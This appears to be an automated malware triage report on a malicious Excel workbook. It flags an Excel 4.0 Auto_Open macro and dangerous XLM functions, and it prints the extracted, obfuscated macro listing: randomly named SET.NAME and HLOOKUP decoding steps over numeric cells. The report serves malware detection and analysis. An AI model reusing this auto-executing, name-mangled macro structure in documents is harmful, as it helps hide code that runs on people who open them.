MALICIOUS
Risk Score: 142
Heuristics: 4
- [critical] Excel 4.0 Auto_Open defined name (OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- [critical] XLM Auto_Open with dangerous formula APIs (OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- [medium] Excel 4.0 (XLM) macro sheet present (OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- [info] Suspicious extracted artifact (EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6861 bytes |

SHA-256: c6645f91586f65bf70f7d55814f4bcf311810987650b7d176cc919b6ef9dd342
Detection
ClamAV: No threats found
Obfuscation or payload: likely
18 of 36 identifiers look randomly generated (e.g. 'bJDQdXVrOEeG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 19 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - uTChJkpypm
' 0018 26 LABEL : Cell Value, String Constant - abCkXJaQlyw len=0
' 0018 20 LABEL : Cell Value, String Constant - aHEPZ len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!C183
' 0018 27 LABEL : Cell Value, String Constant - bJDQdXVrOEeG len=0
' 0018 23 LABEL : Cell Value, String Constant - CaBwHupX len=0
' 0018 23 LABEL : Cell Value, String Constant - CBfwSwfo len=0
' 0018 23 LABEL : Cell Value, String Constant - CkhFuzPr len=0
' 0018 23 LABEL : Cell Value, String Constant - dkOsKTcY len=0
' 0018 20 LABEL : Cell Value, String Constant - fRNGq len=0
' 0018 24 LABEL : Cell Value, String Constant - fzctLcpBC len=0
' 0018 23 LABEL : Cell Value, String Constant - JLSzfuJl len=0
' 0018 24 LABEL : Cell Value, String Constant - oPckrtPka len=0
' 0018 26 LABEL : Cell Value, String Constant - oWTotSrZDsh len=0
' 0018 21 LABEL : Cell Value, String Constant - PDlIgX len=0
' 0018 23 LABEL : Cell Value, String Constant - RLllweSB len=0
' 0018 24 LABEL : Cell Value, String Constant - SUDeLEDrz len=0
' 0018 23 LABEL : Cell Value, String Constant - TEXuQDPG len=0
' 0018 20 LABEL : Cell Value, String Constant - VlmgB len=0
' 0018 20 LABEL : Cell Value, String Constant - vMbdK len=0
' 0018 21 LABEL : Cell Value, String Constant - vWkzyM len=0
' 0018 23 LABEL : Cell Value, String Constant - ZNngvxOb len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' uTChJkpypm,S63,"",595.00000000000000000000
' uTChJkpypm,S64,"",428.00000000000000000000
' uTChJkpypm,S65,"",311.00000000000000000000
' uTChJkpypm,S66,"",-407.00000000000000000000
' uTChJkpypm,S67,"",-12.00000000000000000000
' uTChJkpypm,S68,"",-479.00000000000000000000
' uTChJkpypm,C90,"SET.NAME("abCkXJaQlyw",0+VALUE("0"))",""
' uTChJkpypm,C92,"SET.NAME("oPckrtPka",abCkXJaQlyw)",""
' uTChJkpypm,C94,"SET.NAME("CaBwHupX",abCkXJaQlyw)",""
' uTChJkpypm,C97,"SET.NAME("TEXuQDPG",COUNTA(vWkzyM))",""
' uTChJkpypm,C99,"SET.NAME("CkhFuzPr",COUNTA(vMbdK))",""
' uTChJkpypm,C101,[],""
' uTChJkpypm,C105,"SET.NAME("CBfwSwfo","")",""
' uTChJkpypm,C110,"oPckrtPka",""
' uTChJkpypm,C114,"SET.NAME("JLSzfuJl",HLOOKUP("*",vWkzyM,oPckrtPka,FALSE))",""
' uTChJkpypm,C119,"dkOsKTcY",""
' uTChJkpypm,C123,"SET.NAME("bJDQdXVrOEeG",abCkXJaQlyw)",""
' uTChJkpypm,C128,[],""
' uTChJkpypm,C133,"bJDQdXVrOEeG",""
' uTChJkpypm,C137,"oWTotSrZDsh",""
' uTChJkpypm,C140,"PDlIgX",""
' uTChJkpypm,C144,"RLllweSB",""
' uTChJkpypm,C146,"SET.NAME("aHEPZ",VALUE(HLOOKUP("*",vMbdK,RLllweSB,FALSE)))",""
' uTChJkpypm,C149,"SUDeLEDrz",""
' uTChJkpypm,C154,"CBfwSwfo",""
' uTChJkpypm,C156,"CaBwHupX",""
' uTChJkpypm,C161,NEXT(),""
' uTChJkpypm,C165,"ZNngvxOb",""
' uTChJkpypm,C170,[],""
' uTChJkpypm,C174,"VlmgB",""
' uTChJkpypm,C178,NEXT(),""
' uTChJkpypm,C180,RETURN(),""
' uTChJkpypm,C201,"SET.NAME("fzctLcpBC",C90)",""
' uTChJkpypm,C206,"vWkzyM",""
' uTChJkpypm,C211,"SET.NAME("vMbdK",R55C12)",""
' uTChJkpypm,C216,"SET.NAME("VlmgB",224)",""
' uTChJkpypm,C220,"SET.NAME("fRNGq",3)",""
' uTChJkpypm,C223,fzctLcpBC(),""
' uTChJkpypm,C224,HALT(),""